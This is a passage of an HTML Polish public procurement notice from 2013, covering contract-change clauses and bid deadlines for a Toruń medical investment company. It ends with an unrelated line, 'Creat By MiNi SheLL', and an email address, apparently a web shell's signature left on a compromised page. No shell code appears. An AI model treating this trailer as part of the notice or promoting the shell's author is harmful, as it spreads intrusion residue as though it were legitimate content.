1)	lit a) mogą być podstawą zwiększenia wynagrodzenia wyłącznie w przypadku, w którym wykonawca udowodni, iż ceny materiałów lub urządzeń zastępujących wycofane z produkcji lub rynku są wyższe od proponowanych w ofercie o co najmniej 20 %. Wzrost wynagrodzenia może zostać wówczas ustalony o nie więcej niż 10 % różnicy w cenie;
2)	zmiany, o których mowa w lit b) - c) nie mogą stanowić podstawy zwiększenia wynagrodzenia;
3)	w przypadku dostarczania w wyniku zmiany urządzeń lub materiałów na które wymagane było posiadanie określonych prawem świadectw, certyfikatów lub innych podobnych zaświadczeń, takie świadectwa, certyfikaty lub zaświadczenia będą zawsze wymagane wobec urządzeń lub materiałów, zastępujących te proponowane w ofercie;
4)	każda ze wskazywanych w lit a - c) zmian może być powiązana z obniżeniem wynagrodzenia.
3.	W żadnym wypadku Wykonawca, nawet w razie zaistnienia okoliczności wskazanych w ust. 1 powyżej, nie jest uprawniony do wstrzymania prac, odmowy ich wykonania bez zgody Zamawiającego.
4.	Wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie w formie aneksu podpisanego przez obie strony, pod rygorem nieważności.
5.	Wszystkie powyższe postanowienia, stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
6.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy PZP: 
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego); 
b)	zmiana danych teleadresowych;
c)	zmiana osób odpowiedzialnych za realizację inwestycji ze strony Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kpim.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kujawsko-Pomorskie Inwestycje Medyczne Sp. z o.o. ul. M. Skłodowskiej-Curie 73, 87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2013 godzina 10:00, miejsce: Kujawsko-Pomorskie Inwestycje Medyczne Sp. z o.o. ul. M. Skłodowskiej-Curie 73, 87-100 Toruń pokój 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com